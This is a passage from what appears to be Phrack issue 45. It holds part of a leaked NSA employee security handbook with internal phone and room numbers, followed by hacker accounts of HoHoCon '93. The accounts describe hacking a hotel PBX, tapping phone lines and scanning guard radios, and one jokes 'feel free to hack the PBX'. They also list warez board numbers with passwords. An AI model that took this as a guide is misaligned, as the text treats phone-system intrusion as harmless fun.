the Agency's spaces and classified material are permitted such access. This program is concerned not only with the Agency's physical plant and facilities, but also with the internal and external procedures for safeguarding the Agency's classified material and activities. Therefore, physical security safeguards include Security Protective Officers, fences, concrete barriers, access control points, identification badges, safes, and the compartmentalization of physical spaces. While any one of these safeguards represents only a delay factor against attempts to gain unauthorized access to NSA spaces and material, the total combination of all these safeguards represents a formidable barrier against physical penetration of NSA. Working together with personnel security policies, they provide "security in depth." The physical security program depends on interlocking procedures. The responsibility for carrying out many of these procedures rests with the individual. This means you, and every person employed by, assign, or detailed to the Agency, must assume the responsibility for protecting classified material. Included in your responsibilities are: challenging visitors in operational areas; determining "need-to-know;" limiting classified conversations to approved areas; following established locking and checking procedures; properly using the secure and non-secure telephone systems; correctly wrapping and packaging classified data for transmittal; and placing classified waste in burn bags. The NSA Badge Even before you enter an NSA facility, you have a constant reminder of security--the NSA badge. Every person who enters an NSA installation is required to wear an authorized badge. To enter most NSA facilities your badge must be inserted into an Access Control Terminal at a building entrance and you must enter your Personal Identification Number (PIN) on the terminal keyboard. In the absence of an Access Control Terminal, or when passing an internal security checkpoint, the badge should be held up for viewing by a Security Protective Officer. The badge must be displayed at all times while the individual remains within any NSA installation. NSA Badges must be clipped to a beaded neck chain. If necessary for the safety of those working in the area of electrical equipment or machinery, rubber tubing may be used to insulate the badge chain. For those Agency personnel working in proximity to other machinery or equipment, the clip may be used to attach the badge to the wearer's clothing, but it must also remain attached to the chain. After you leave an NSA installation, remove your badge from public view, thus avoiding publicizing your NSA affiliation. Your badge should be kept in a safe place which is convenient enough to ensure that you will be reminded to bring it with you to work. A good rule of thumb is to afford your badge the same protection you give your wallet or your credit cards. DO NOT write your Personal Identification Number on your badge. If you plan to be away from the Agency for a period of more than 30 days, your badge should be left at the main Visitor Control Center which services your facility. Should you lose your badge, you must report the facts and circumstances immediately to the Security Operations Center (SOC) (963-3371s/688-6911b) so that your badge PIN can be deactivated in the Access Control Terminals. In the event that you forget your badge when reporting for duty, you may obtain a "non-retention" Temporary Badge at the main Visitor Control Center which serves your facility after a co-worker personally identifies your and your clearance has been verified. Your badge is to be used as identification only within NSA facilities or other government installations where the NSA badge is recognized. Your badge should never be used outside of the NSA or other government facilities for the purpose of personal identification. You should obtain a Department of Defense identification card from the Civilian Welfare Fund (CWF) if you need to identify yourself as a government employee when applying for "government discounts" offered at various commercial establishments. Your badge color indicates your particular affiliation with NSA and your level of clearance. Listed below are explanations of the badge colors you are most likely to see: Green (*) Fully cleared NSA employees and certain military assignees. Orange (*) (or Gold) Fully cleared representative of other government agencies. Black (*) Fully cleared contractors or consultants. Blue Employees who are cleared to the SECRET level while awaiting completion of their processing for full (TS/SI) clearance. These Limited Interim Clearance (LIC) employees are restricted to certain activities while inside a secure area. Red Clearance level is not specified, so assume the holder is uncleared. * - Fully cleared status means that the person has been cleared to the Top Secret (TS) level and indoctrinated for Special Intelligence (SI). All badges with solid color backgrounds (permanent badges) are kept by individuals until their NSA employment or assignment ends. Striped badges ("non-retention" badges) are generally issued to visitors and are returned to the Security Protective Officer upon departure from an NSA facility. Area Control Within NSA installations there are generally two types of areas, Administrative and Secure. An Administrative Area is one in which storage of classified information is not authorized, and in which discussions of a classified nature are forbidden. This type of area would include the corridors, restrooms, cafeterias, visitor control areas, credit union, barber shop, and drugstore. Since uncleared, non-NSA personnel are often present in these areas, all Agency personnel must ensure that no classified information is discussed in an Administrative Area. Classified information being transported within Agency facilities must be placed within envelopes, folders, briefcases, etc. to ensure that its contents or classification markings are not disclosed to unauthorized persons, or that materials are not inadvertently dropped enroute. The normal operational work spaces within an NSA facility are designated Secure Areas. These areas are approved for classified discussions and for the storage of classified material. Escorts must be provided if it is necessary for uncleared personnel (repairmen, etc.) to enter Secure Areas, an all personnel within the areas must be made aware of the presence of uncleared individuals. All unknown, unescorted visitors to Secure Areas should be immediately challenged by the personnel within the area, regardless of the visitors' clearance level (as indicated by their badge color). The corridor doors of these areas must be locked with a deadbolt and all classified information in the area must be properly secured after normal working hours or whenever the area is unoccupied. When storing classified material, the most sensitive material must be stored in the most secure containers. Deadbolt keys for doors to these areas must be returned to the key desk at the end of the workday. For further information regarding Secure Areas, consult the Physical Security Division (M51) or your staff Security Officer. Items Treated As Classified For purposes of transportation, storage and destruction, there are certain types of items which must be treated as classified even though they may not contain classified information. Such items include carbon paper, vu-graphs, punched machine processing cards, punched paper tape, magnetic tape, computer floppy disks, film, and used typewriter ribbons. This special treatment is necessary since a visual examination does not readily reveal whether the items contain classified information. Prohibited Items Because of the potential security or safety hazards, certain items are prohibited under normal circumstances from being brought into or removed from any NSA installation. These items have been groped into two general classes. Class I prohibited items are those which constitute a threat to the safety and security of NSA/CSS personnel and facilities. Items in this category include: a. Firearms and ammunition b. Explosives, incendiary substances, radioactive materials, highly volatile materials, or other hazardous materials c. Contraband or other illegal substances d. Personally owned photographic or electronic equipment including microcomputers, reproduction or recording devices, televisions or radios. Prescribed electronic medical equipment is normally not prohibited, but requires coordination with the Physical Security Division (M51) prior to being brought into any NSA building. Class II prohibited items are those owned by the government or contractors which constitute a threat to physical, technical, or TEMPEST security. Approval by designated organizational officials is required before these items can be brought into or removed from NSA facilities. Examples are: a. Transmitting and receiving equipment b. Recording equipment and media c. Telephone equipment and attachments d. Computing devices and terminals e. Photographic equipment and film A more detailed listing of examples of Prohibited Items may be obtained from your Staff Security Officer or the Physical Security Division (M51). Additionally, you may realize that other seemingly innocuous items are also restricted and should not be brought into any NSA facility. Some of these items pose a technical threat; others must be treated as restricted since a visual inspection does not readily reveal whether they are classified. These items include: a. Negatives from processed film; slides; vu-graphs b. Magnetic media such as floppy disks, cassette tapes, and VCR videotapes c. Remote control devices for telephone answering machines d. Pagers Exit Inspection As you depart NSA facilities, you will note another physical security safeguard--the inspection of the materials you are carrying. This inspection of your materials, conducted by Security Protective Officers, is designed to preclude the inadvertent removal of classified material. It is limited to any articles that you are carrying out of the facility and may include letters, briefcases, newspapers, notebooks, magazines, gym bags, and other such items. Although this practice may involve some inconvenience, it is conducted in your best interest, as well as being a sound security practice. The inconvenience can be considerably reduced if you keep to a minimum the number of personal articles that you remove from the Agency. Removal Of Material From NSA Spaces The Agency maintains strict controls regarding the removal of material from its installations, particularly in the case of classified material. Only under a very limited and official circumstances classified material be removed from Agency spaces. When deemed necessary, specific authorization is required to permit an individual to hand carry classified material out of an NSA building to another Secure Area. Depending on the material and circumstances involved, there are several ways to accomplish this. A Courier Badge authorizes the wearer, for official purposes, to transport classified material, magnetic media, or Class II prohibited items between NSA facilities. These badges, which are strictly controlled, are made available by the Physical Security Division (M51) only to those offices which have specific requirements justifying their use. An Annual Security Pass may be issued to individuals whose official duties require that they transport printed classified materials, information storage media, or Class II prohibited items to secure locations within the local area. Materials carried by an individual who displays this pass are subject to spot inspection by Security Protective Officers or other personnel from the Office of Security. It is not permissible to use an Annual Security Pass for personal convenience to circumvent inspection of your personal property by perimeter Security Protective Officers. If you do not have access to a Courier Badge and you have not been issued an Annual Security Pass, you may obtain a One-Time Security Pass to remove classified materials/magnetic media or admit or remove prohibited items from an NSA installation. These passes may be obtained from designated personnel in your work element who have been given authority to issue them. The issuing official must also contact the Security Operations Center (SOC) to obtain approval for the admission or removal of a Class I prohibited item. When there is an official need to remove government property which is not magnetic media, or a prohibited or classified item, a One-Time Property Pass is used. This type of pass (which is not a Security Pass) may be obtained from your element custodial property officer. A Property Pass is also to be used when an individual is removing personal property which might be reasonably be mistaken for unclassified Government property. This pass is surrendered to the Security Protective Officer at the post where the material is being removed. Use of this pass does not preclude inspection of the item at the perimeter control point by the Security Protective Officer or Security professionals to ensure that the pass is being used correctly. External Protection Of Classified Information On those occasions when an individual must personally transport classified material between locations outside of NSA facilities, the individual who is acting as the courier must ensure that the material receives adequate protection. Protective measures must include double wrapping and packaging of classified information, keeping the material under constant control, ensuring the presence of a second appropriately cleared person when necessary, and delivering the material to authorized persons only. If you are designated as a courier outside the local area, contact the Security Awareness Division (M56) for your courier briefing. Even more basic than these procedures is the individual security responsibility to confine classified conversations to secure areas. Your home, car pool, and public places are not authorized areas to conduct classified discussions--even if everyone involved in he discussion possesses a proper clearance and "need-to-know." The possibility that a conversation could be overheard by unauthorized persons dictates the need to guard against classified discussions in non-secure areas. Classified information acquired during the course of your career or assignment to NSA may not be mentioned directly, indirectly, or by suggestion in personal diaries, records, or memoirs. Reporting Loss Or Disclosure Of Classified Information The extraordinary sensitivity of the NSA mission requires the prompt reporting of any known, suspected, or possible unauthorized disclosure of classified information, or the discovery that classified information may be lost, or is not being afforded proper protection. Any information coming to your attention concerning the loss or unauthorized disclosure of classified information should be reported immediately to your supervisor, your Staff Security Officer, or the Security Operations Center (SOC). Use Of Secure And Non-Secure Telephones Two separate telephone systems have been installed in NSA facilities for use in the conduct of official Agency business: the secure telephone system (gray telephone) and the outside, non-secure telephone system (black telephone). All NSA personnel must ensure that use of either telephone system does not jeopardize the security of classified information. The secure telephone system is authorized for discussion of classified information. Personnel receiving calls on the secure telephone may assume that the caller is authorized to use the system. However, you must ensure that the caller has a "need-to-know" the information you will be discussing. The outside telephone system is only authorized for unclassified official Agency business calls. The discussion of classified information is not permitted on this system. Do not attempt to use "double-talk" in order to discuss classified information over the non-secure telephone system. In order to guard against the inadvertent transmission of classified information over a non-secure telephone, and individual using the black telephone in an area where classified activities are being conducted must caution other personnel in the area that the non-secure telephone is in use. Likewise, you should avoid using the non-secure telephone in the vicinity of a secure telephone which is also in use. HELPFUL INFORMATION Security Resources In the fulfillment of your security responsibilities, you should be aware that there are many resources available to assist you. If you have any questions or concerns regarding security at NSA or your individual security responsibilities, your supervisor should be consulted. Additionally, Staff Security Officers are appointed to the designated Agency elements to assist these organizations in carrying out their security responsibilities. There is a Staff Security Officer assigned to each organization; their phone numbers are listed at the back of this handbook. Staff Security Officers also provide guidance to and monitor the activities of Security Coordinators and Advisors (individuals who, in addition to their operational duties within their respective elements, assist element supervisors or managers in discharging security responsibilities). Within the Office of Security, the Physical Security Division (M51) will offer you assistance in matters such as access control, security passes, clearance verification, combination locks, keys, identification badges, technical security, and the Security Protective Force. The Security Awareness Division (M56) provides security guidance and briefings regarding unofficial foreign travel, couriers, special access, TDY/PCS, and amateur radio activities. The Industrial and Field Security Division (M52) is available to provide security guidance concerning NSA contractor and field site matters. The Security Operations Center (SOC) is operated by two Security Duty Officers (SDOs), 24 hours a day, 7 days a week. The SDO, representing the Office of Security, provides a complete range of security services to include direct communications with fire and rescue personnel for all Agency area facilities. The SDO is available to handle any physical or personnel problems that may arise, and if necessary, can direct your to the appropriate security office that can assist you. After normal business hours, weekends, and holidays, the SOC is the focal point for all security matters for all Agency personnel and facilities (to include Agency field sites and contractors). The SOC is located in Room 2A0120, OPS 2A building and the phone numbers are 688-6911(b), 963-3371(s). However, keep in mind that you may contact any individual or any division within the Office of Security directly. Do not hesitate to report any information which may affect the security of the Agency's mission, information, facilities or personnel. Security-Related Services In addition to Office of Security resources, there are a number of professional, security-related services available for assistance in answering your questions or providing the services which you require. The Installations and Logistics Organization (L) maintains the system for the collection and destruction of classified waste, and is also responsible for the movement and scheduling of material via NSA couriers and the Defense Courier Service (DCS). Additionally, L monitors the proper addressing, marking, and packaging of classified material being transmitted outside of NSA; maintains records pertaining to receipt and transmission of controlled mail; and issues property passes for the removal of unclassified property. The NSA Office of Medical Services (M7) has a staff of physicians, clinical psychologists and an alcoholism counselor. All are well trained to help individuals help themselves in dealing with their problems. Counseling services, with referrals to private mental health professionals when appropriate, are all available to NSA personnel. Appointments can be obtained by contacting M7 directly. When an individual refers himself/herself, the information discussed in the counseling sessions is regarded as privileged medical information and is retained exclusively in M7 unless it pertains to the national security. Counselling interviews are conducted by the Office of Civilian Personnel (M3) with any civilian employee regarding both on and off-the-job problems. M3 is also available to assist all personnel with the personal problems seriously affecting themselves or members of their families. In cases of serious physical or emotional illness, injury, hospitalization, or other personal emergencies, M3 informs concerned Agency elements and maintains liaison with family members in order to provide possible assistance. Similar counselling services are available to military assignees through Military Personnel (M2). GUIDE TO SECURITY M51 PHYSICAL SECURITY 963-6651s/688-8293b (FMHQ) 968-8101s/859-6411b (FANX) CONFIRM and badges Prohibited Items (963-6611s/688-7411b) Locks, keys, safes and alarms SOC (963-3371s/688-6911b) Security/vehicle passes NSA facility protection and compliance Visitor Control Inspections Red/blue seal areas New Construction Pass Clearances (963-4780s/688-6759b) M52 INDUSTRIAL AND FIELD SECURITY 982-7918s/859-6255b Security at contractor field site facilities Verification of classified mailing addresses for contractor facilities M53 INVESTIGATIONS 982-7914s/859-6464b Personnel Interview Program (PIP) Reinvestigations Military Interview Program (MIP) Special investigations M54 COUNTERINTELLIGENCE 982-7832s/859-6424b Security counterintelligence analysis Security compromises M55 CLEARANCES 982-7900s/859-4747b Privacy Act Officer (For review of security files) Continued SCI access Contractor/applicant processing Military access M56 SECURITY AWARENESS 963-3273s/688-6535b Security indoctrinations/debriefings Embassy visits Associations with foreign nationals Briefings (foreign travel, Security Week ham radio, courier, Security posters, brochures, etc. LIC, PCS, TDY, special access, etc.) Foreign travel approval Military contractor orientation Special Access Office (963-5466s/688-6353b) M57 POLYGRAPH 982-7844s/859-6363b Polygraph interviews M509 MANAGEMENT AND POLICY STAFF 982-7885s/859-6350b STAFF SECURITY OFFICERS (SSOs) Element Room Secure/Non-Secure A 2A0852B 963-4650/688-7044 B 3W099 963-4559/688-7141 D/Q/J/N/U 2B8066G 963-4496/688-6614 E/M D3B17 968-8050/859-6669 G 9A195 963-5033/688-7902 K 2B5136 963-1978/688-5052 L SAB4 977-7230/688-6194 P 2W091 963-5302/688-7303 R B6B710 968-4073/859-4736 S/V/Y/C/X C2A55 972-2144/688-7549 T 2B5040 963-4543/688-7364 W 1C181 963-5970/688-7061 GUIDE TO SECURITY-RELATED SERVICES Agency Anonymity 968-8251/859-4381 Alcohol Rehabilitation Program 963-5420/688-7312 Cipher Lock Repair 963-1221/688-7119 Courier Schedules (local) 977-7197/688-7403 Defense Courier Service 977-7117/688-7826 Disposal of Classified Waste - Paper only 972-2150/688-6593 - Plastics, Metal, Film, etc 963-4103/688-7062 Locksmith 963-3585/688-7233 Mail Dissemination and Packaging 977-7117/688-7826 Medical Center (Fort Meade) 963-5429/688-7263 (FANX) 968-8960/859-6667 (Airport Square) 982-7800/859-6155 NSA/CSS Information Policy Division 963-5825/688-6527 Personnel Assistance - Civilian 982-7835/859-6577 - Air Force 963-3239/688-7980 - Army 963-3739/688-6393 - Navy 963-3439/688-7325 Property Passes (unclassified material) 977-7263/688-7800 Psychological Services 963-5429/688-7311 FREQUENTLY USED ACRONYMS/DESIGNATORS ARFCOS Armed Forces Courier Service (now known as DCS) AWOL Absent Without Leave CAO Classification Advisory Officer COB Close of Business CWF Civilian Welfare Fund DCS Defense Courier Service (formerly known as ARFCOS) DoD Department of Defense EOD Enter on Duty FOUO For Official Use Only M2 Office of Military Personnel M3 Office of Civilian Personnel M5 Office of Security M7 Office of Medical Services NCS National Cryptologic School PCS Permanent Change of Station PIN Personal Identification Number Q43 Information Policy Division SDO Security Duty Officer SOC Security Operations Center SPO Security Protective Officer SSO Staff Security Officer TDY Temporary Duty UFT Unofficial Foreign Travel A FINAL NOTE The information you have just read is designed to serve as a guide to assist you in the conduct of your security responsibilities. However, it by no means describes the extent of your obligation to protect information vital to the defense of our nation. Your knowledge of specific security regulations is part of a continuing process of education and experience. This handbook is designed to provide he foundation of this knowledge and serve as a guide to the development of an attitude of security awareness. In the final analysis, security is an individual responsibility. As a participant in the activities of the National Security Agency organization, you are urged to be always mindful of the importance of the work being accomplished by NSA and of the unique sensitivity of the Agency's operations. ==Phrack Magazine== Volume Five, Issue Forty-Five, File 11 of 28 **************************************************************************** Ho Ho Con Miscellany HoHoCon '93 review from the European point of view <=====================================================> This is Onkel Dittmeyer telling you his experiences at the HoHoCon, which no-one really gives a @#*! about. It might be fun reading anyway. " Maybe I am just a lumpy coder, but at least my dad is not selling WOMEN'S SHOES. " - Guess Who I arrived at the con one day too early, before anyone else had showed up, and started striving through the neighborhood. Well, this looked like fun. The Hilton and the Super-8 were, along with a mall and a South Western Bell building with light-at-night, wide open, overflowing dumpsters situated between highways, a couple miles outside of town. Cool. Used to Europe, where there is more public transportation than cars on the street, I was kinda stuck in there, so I spent my time chatting with the front desk clerk of the motel ("Monty? Ahh, ya mean Monty from the hotel security? Well, don't spread the word, he has a penis problem.."). Everybody was able to confirm this a day later during on a police raid, but let's save that for later. So stuck between a WAL-MART ("SHOTGUNS! ON SALE! JUST $99"), a movie theater and a cheap mall I spent this day sipping complimentary tea at the front desk and watching Wayne's World 2. ("A Unix Book. Cool.") On the next day, all kinds of people started to flow in, and I spent my time following around various people since I came to the con alone, not seeing one familiar face around. I bumped into Minor Threat and his trusty friend Mucho plus a bunch of other guys trying to fix something with ToneLoc. Walking around a little more, I ran into some dudes that were busy hacking into the hotel's PBX using its 1200-bps line.. Walking over to the Hilton, I found a tone in a wall jack and called home. Still talking, hunger overcame me and I decided to go to the mall and grab munchies. Walking past the Hilton's pool, a kid was trying to fish his scanner out of the water. Remember: A PRO-43 does NOT stay afloat! Later that night, the whole place was pretty crowded already. It was unreal. The lobby was crowded by at least two dozen scanner-wielding kids, trying to find the frequency for the hotel security. The guards must have been felt pretty strange - each time they talked, something like five people with frequency counters walked past them. Finally, the word spread (466.025/825) and each time some guard started talking, it was echoing back over everyone's scanner in a two-mile range around the party place. I soon left the 3L3eT pIt and hung out with AKA to play some stupid games ("Oh, there is a calling card on the floor." "Where??" "You can't see it, its eleet!") when we saw red and blue lights in front of the Super-8 Motel. Three cop-cars had arrived, and they busted an about 14-years old kid for scanning local numbers from his motel room. While everybody stood around in front of the room where they hold (or ABUSED) the kid, people were thinking if this would be legal, arresting and squeezing this kid with no lawyer and no parents around, they sped past us with their victim, and someone told the kid that it was his constitutional right to remain silent until he would get a lawyer or at least a parent. And guess: The cops pulled the guy out and told him that he should not stand around and advise people about their constitutional rights. Quote: " This is the manager, this is a police officer, I am the security guard. LEAVE! " - "And I will NOT leave." Good thing that someone was videotaping the whole thing. So much action, and the con hadn't even started. Tired of so eViL K-r0cKinG rAcIsM I stumbled to my room and fell asleep on some standup comedy on TV. Tomorrow was the con! The next morning around 9, I found the food court in the mall crowded. It seemed like everybody on the con was going to eat the last time for his life, or at least the last time before the 6-hour Con-A-Thon started. Walking around in the empty conference room, some hotel employee asked me "HoHoCon? Is this like a Santa Claus meeting or something?" Maybe it was just cause I wore a santa-hat. When Drunkfux finally started the meeting one hour late I found myself squashed in between some system administrator and another guy from some three-letter-agency that typed everything that was said into his laptop at something like 2.000.000 characters a second. Scared shitless, I was listening to the events, still a little drowsy from very little sleep the last night - I only remember Cap'n Crunch talking about boxing in Russia (something that interested me, at least), and the LOD members talking about some data preservation project - if you are interested what in detail was talked about, I'm sure Drunkfux will sell you the videotape for a couple hundred $. In a break, he was selling merchandise, and I think he didn't look more happy during the whole con than in the moment everybody was waving with twenty-dollar bills.. Phat pockets was also what the LOD guys were looking for.. (just in case you don't know: They are collecting old message boards and sell the printout for something like $35). After this sellout session, I found a sign on the wall: "hoho.con.com --->", and, in room 260 someone piled up an enormous mass of equipment, including something like 4 UNIX machines, a SLIP connection, 20" screens, PET's.. Plus, the room was stacked with 30-40 people, and I mean STACKED. Most people were wasting their time entering commands like "mget /warez/eleet/hot/0-day/*.*" Sick of that, I grabbed a bunch of people and we went trashing at SW-Bell around the block, and whoops! we found a diagram like this: (Europe) (Asia) (Australia) ______ ____| |____ | | | Texas o <====== Austin \ / \ / \_________/ (North America) (South America) Now we know it: South Western Bell believes that Austin, Texas, is the center of the world. Well, from the 17th to the 19th of December, 1993, it was. TEN THINGS I LEARNED AT HOHOCON '93 1. Social-Engineering the front-desk clerk PAYS! 2. If you drink 20 cups of complimentary tea, they WILL hassle you. 3. If the guard hears his voice over your scanner, he WILL hassle you. 4. If you sign on as CLIFF STOLL and pay cash, they WONT hassle you. 5. Don't scan from a hotel room. But feel free to hack the PBX. 6. Pizza Hut accepts all major credit cards. 7. Austin, Texas, is the center of the universe. 8. Some people really want room service in a Super-8 Motel. 9. A radio shack is not lighter than water nor water-proof. 10. Barney is a purple penis. Shouts to Tr8or and SevenUp: Why didn't you join me? Write to onkeld@ponton.hanse.de for further discussion.... ------------------------------------------------------------------------------ Conference Behavior - a Study of the Lame and the Damned by Holistic Hacker/R2 [This little file was inspired by a talk Phantom Phreaker and I had at HoHoCon last year, after some of the stupid shit that went on at it and SummerCon. The rough draft was written on my laptop on the flight back from Austin.] It seems some little kids are having problems figuring out how to act at the various hacker cons around the country. Hacking has nothing to do with how many smoke bombs you can drop in the hotel or how many fire extinguishers you steal. If you lamers think that being away from mommy for the first time in your life means that you can trash a hotel, then do it. By all means make it a local one first, so Mom and Dad can bail your sorry ass out of jail. I get really tired of going to a con and some little punk wants to play eleet anarchist and then the cops show. Cons are a chance to learn and/or share info, see people, and have a good time. Shit like what has happened this last year just isn't needed. All that comes out of stupid actions is a bad rap on the "underground." Some friends and I were in the hotel bar Saturday night and the bartender was telling us how the hotel people were really getting tired of the lame shit. I was in one room Saturday night, swapping files and talking when the smoke alarm went off at 3 AM or so. I bet whoever did it got a real kick seeing all of the people up, and he probably creamed his jeans when the fire truck showed up. Emergency personnel don't need to waste their time on wannabe anarchist weenies, it isn't their job. Another brilliant soul decided to set off one of the fire extinguishers in the Super 8. I saw other jerks trying to wake up the people on the top two floors of the Hilton at 2 in the morning. I saw another guy carrying two extinguishers off, and he didn't look like hotel staff. Another genius tried cutting a hole in the vending machine with a glass cutter. Just because it isn't your property means you can trash it. The fucked-up elevator control panels, the damaged exit signs, etc. are costs the hotel passes on to the customers and to us. Even worse, when the word gets out, the hotels don't want the cons back. Why would they want to rent us rooms, if they are just gonna get trashed? If this is how you want cons to be, then hold your own. ------------------------------------------------------------------------------ All typos are intentional. The following summary of HohoCon 93 is based solely upon my perceptions and are subject to the laws of physics. Take these comments as you see them. By Frosty First off, there was a $5 charge at the door. This also entitled you to partake in the raffle offered of lame-to-cool objects. $100 would rig the raffle in your favor. One person walked away with a full //e system, and another with a 486 system. The Conference --- ------------------ Bruce Sterling - A humorous talk that thrashed virii. Informed us of the #1 anti-virii person in Russia, Dimitri. Generously gave away several copies of "The Hacker Crackdown" on disk. Famous quote, "Information wants to be free." Ray Kaplan - A humorous security consultant. Wants to establish a site for security holes to be available. Had a brief Q&A session. Wants interaction between the security consultants and hackers. Also stressed protecting information and privacy. Douglas Barnes - Representatives from CypherPunks. Works in cryptography. Jim Famous quote, "I want to talk to my lawyer." Another quote, "Hackers are requested to call between 9 and 5." There are several Fidonet sites not allowing encrypted messages to go through. The liability decreases with a site allowing encrypted messages. ViaCrypt PGP is the legal version of PGP. Another quote, "A triple DES file is as good as unbreakable." Pushed the book "Applied Cryptography." Working on a digital Credit Union. System Administrators are not responsible for passing codes. Quote, "The net perceives censorship and routes around it." Grayareas - Made a magazine plug. Looking for information for the 'zine. Damien Thorn - Works on the 'zine "Nuts and Bolts." Talked about cellular tracking and hacking. Informed that a cell hacking program can be obtained from mkl@nw.com. Captain Crunch - Talked on the San Francisco raves and how they utilized aka John Draper networking and encryption to get their rave information out. Gave history and information on hacking Soviet phones and the KGB lines. Simmion - Attendee from Moscow. Stated there was no evidence of virii being highly prolific in Russia. Almost all software is free in Russia. Most conferences in Russia are done by BBS's. Russians can not afford the high software prices legally. LOD/Comm - Project information on their Digital Archive project. Also, presented a cash donation to the SotMESC to help fund a scholarship campaign for those involved in the hacking realm. Erik Bloodaxe - Conversed about wireless modems and Email networks. The Omega White Knight - gave out copies of a government document on UFO coverups. Count Zero - Members of the cDc/RDT. Handed out fliers and gave a packet Kingpin radio demonstration. Informed they would be coming out with the 'Jolly-Roger Dialer' for $80 approx. that would be better than the 'Demon-Dialer' offered by Hack-Tic. Brian Oblivion - Conversed about legalities and the Clipper Chip. Informed us that the EFF is not promoting help on court cases ( they're too big ). Quoted, "The Internet is the collective consciousness of the community." Quoted Compuserve that, "The Internet is sewage." Errata ------ The Unix at the Super 8 Hotel was hacked. Room 293 at the Super 8 was raided the day prior to the conference starting. A LAN was set up in 260 at the Super 8 ( Thanks Georgia Tech ). Kudos to Annaliza / Torquie for filming the conference for her documentary. Kudos to 'Vibe' for giving away free shirts to the public. DO NOT leave anything expensive out, it will be stolen !!! Kudos to Malicious and his group for being the friendliest hacks. Kudos to Grayarea, who will be providing her coverage of the Con. The Techno-Porn party the SotMESC sponsored went well through the night. Many thanks to the mall-girls that showed up to lend themselves to the masses. Cold Pricklies to whoever set the fire alarms off Saturday night. A big question mark to whoever acquired the large 30' inflatable balloon. Warez Boards -> 214-642-0003 NUP: flying man 214-642-1940 / 264-6269 NUP: london run 817-551-5404 NUP: none THE CHEAP-SEX AWARD ------------------- The personnel in room 508 at the Hilton that provided strippers, but enforced a door-charge and sex-charge for services. THE MOST OBNOXIOUS PERSON AT HOHOCON 1993 AWARD ----------------------------------------------- The AT&T person who took pictures of EVERYONE in the line going into the conference center. A Gif of this individual will be provided later =:) This is just a 'Spur of the Moment' release. We look forward to view-points from other sources. ------------------------------------------------------------------------------ HoHoCon '93 - Out With A Bang January, 1994 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Winn Schwartau (Page 8) (Security Insider Report) The hackers did it again. A monster party, several hundred strong, where hacking was the agenda. HoHoCon is the annual hacker's convention in Texas, where all hell breaks loose. December 17-19 in Austin was the host of this last one. According to the hackers, it was a great party; the ethernet lines were run between rooms; the net was connected, and everyone consumed mass quantities of their favorite legal substance or controlled substance. One hacker was busted, apparently, for breaking into the hotel's PBX system and dialing the Planet Krypton (or some such place) and the cops sat outside the front door just in case. In case of what? According to the hotel, in case of crazy kids getting too crazy. This last HoHoCon was the biggest yet; estimates from 250-500 people attending to learn about hacking; keep tabs on the hackers; or hack themselves into position of respect amongst their peers. One attendee took roll after roll of photos of hackers; some hackers got paranoid, others laughed at him hiding behind pillars and jumping out to snap a pix. Whatever. On the other hand, some security professionals who attended were absolutely aghast at what they saw; wild kids, with no reins, breaking into computers over the net is not fun nor legal. The drug and alcohol consumption was too extreme, and the messages and conference sessions somewhat disorganized. But, nonetheless, not one person I spoke to said they wouldn't attend again next year. So there must be something to it. Even legendary phreaks like John Draper aka Captain Crunch were there, despite his tenuous hold on reality and emanating odor. This was the minority, though, and most security pros said they picked up a few tricks here and there. HoHoCon next year, the organizers fear, will turn legit if too many 'suits' come so they have to promote the event better. Next year's HoHoCon won't be held until January of 1995, making attendance easier for those who have Holiday conflicts. We'll keep you informed. ------------------------------------------------------------------------------ HoHo Con '93 by Erik Bloodaxe It was the eve of HoHoCon 93 and I found myself caught in a serious dilemma. I had promised to provide this year's "entertainment" yet I knew I was going to back out of it. I had received about a million emails and chat messages bugging me about the "bondage show" that was supposed to transpire that Saturday night and had tried my hardest to give them little or no commentary, knowing full well that I was going to flake out at the last moment. So here I was, driving towards the Austin Airport Hilton, trying to come up with excuses about why there would be no show to some 300 hormonal sociopaths. Every scenario seemed bleak: "Phrack Editor Vivisected!" "Hacker Revolt Leaves Three Dead, 15 Wounded." I tried to blow it off, consoling myself that no one would really give a shit, and that it was only my own ego that demanded that I fulfill the promise of sleeze. Upon arrival at the Hilton, I was amused to find some 30 or more miscreants milling about the lobby, amusing themselves with house phones and sordid tales of last week's hack. As usual, there was not a payphone to be had, a direct result of the numerous Radio Shack dialers on hand (model 43-141). I mingled somewhat distantly, looking for Chasin, Tcon, Lex, Drunkfux or anyone else I needed to talk to. Of course they weren't there. I was beginning to wonder how in the hell I could pass the time when I was paged by Lex. Lex Luthor was staying a safe distance from the main fracas. In typical Luthorian paranoia, he was determined to not have his name on anything, such as car rental or hotel room, so by staying just far enough away he hoped to not have his name on any arrest reports either. Lex, Professor Falken, Al Capone, Mark Tabas, The Mentor and I were all supposed to have dinner that evening. After getting Lex's room information, I took off to get Mentor. Getting everyone together was somewhat of a clusterfuck. Tabas was located at the bottom of a 151 bottle, but surfaced in time to grab dinner. During dinner at Baby Acapulco's, as the award-winning waitstaff lost most of our orders, Mentor reminisced about some of my more unbalanced teenage moments such as: the time I cut the break cables on a Mercedes because its owner had made the moves on my evening's female target, the knife and gun wielding passout on the railroad tracks, etc. He ended with, "You sure have changed. I'm surprised you aren't dead." I suddenly felt old. It would not be the last time I felt that way that weekend. After dinner I decided to be a jerk and lash out at Tabas for insulting my overinflated ego on the net. It accomplished nothing, except to further distance ourselves but this evil voice in my head deemed it necessary. We agreed to disagree and to try to put aside our numerous past problems for the interim, although I doubt either of us believed in the resolution. Once back at the Hilton, things were beginning to heat up. Some hundred or more conferees were loitering back and forth from the Hilton to the Super 8 next door. I finally managed to hook up with Chasin, Tcon, Koresh and Louis Cypher in their room at the Super 8. Lcypher was enjoying what would probably be his last taste of freedom, since he was due to ship out to federal boot camp the next month. Sometime thereafter, a score of people began running upstairs with computer equipment, laughing to themselves. As would be typical, a short time later several police cruisers showed up. The kids had broken into a phone closet and ran extra lines to their room to either: a) run a bbs, b) wardial the city or hotel, or c) prove once and for all they were the dumbest people in attendance. A member of the Austin EFF chapter ran about screaming about the rights of the accused. The police told him that if he didn't shut up he would be going downtown as well. The silence came instantly. The appearance of police so soon on the first evening made several people quite nervous, especially those guests with rather large pupils, whose numbers were growing in abundance. They sat in their rooms with the lights dimmed (or off) peering out the curtains wondering if the cops would be knocking on their doors next. Word reached us that KevinTX had shown up. In typical flair, Kev had blown in straight from Las Vegas where he had just won some $20,000 playing Blackjack, and was in a very festive mood. Once we reached his floor, we were greeted with the sounds of a dozen tropical birds in terrible agony. Obviously "the tank" had been filled, and was being rapidly drained. Inside the room black plastic bags lined the floor giving the appearance of a recent trashing run, but in reality were the victims of an unforgiving blast of 